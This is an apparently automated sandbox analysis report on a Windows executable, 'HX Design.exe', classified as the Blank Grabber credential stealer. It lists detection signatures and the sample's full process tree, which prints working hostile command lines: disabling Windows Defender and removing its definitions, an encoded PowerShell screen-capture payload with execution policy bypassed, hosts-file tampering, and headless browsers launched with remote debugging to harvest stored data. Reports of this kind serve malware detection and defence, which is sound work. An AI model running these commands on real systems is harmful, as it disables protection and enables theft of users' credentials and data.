Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HX Design.exe

Overview

General Information

Sample name:HX Design.exe
Analysis ID:1579227
MD5:55933983c78673a3d30c3d7f8bd54b83
SHA1:d9e701fe9c117fb428a533c219af3fcffbc42f34
SHA256:9203d748f205c44735ccb43f9312cc818693de205075d8c0d3a3582eca6e2e63
Tags:exesigneduser-lonenone1807
Infos:

Detection

Python Stealer, Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies the hosts file
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • HX Design.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\HX Design.exe" MD5: 55933983C78673A3D30C3D7F8BD54B83)
    • HX Design.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\HX Design.exe" MD5: 55933983C78673A3D30C3D7F8BD54B83)
      • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7764 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7224 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7704 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7376 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7756 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7860 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8140 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6712 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5312 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7412 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7804 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7296 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7828 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8044 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2816 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7284 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8012 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7940 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8072 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3492 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1732 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 1460 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4080 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • chrome.exe (PID: 908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 3992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8112 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7280 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3448 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
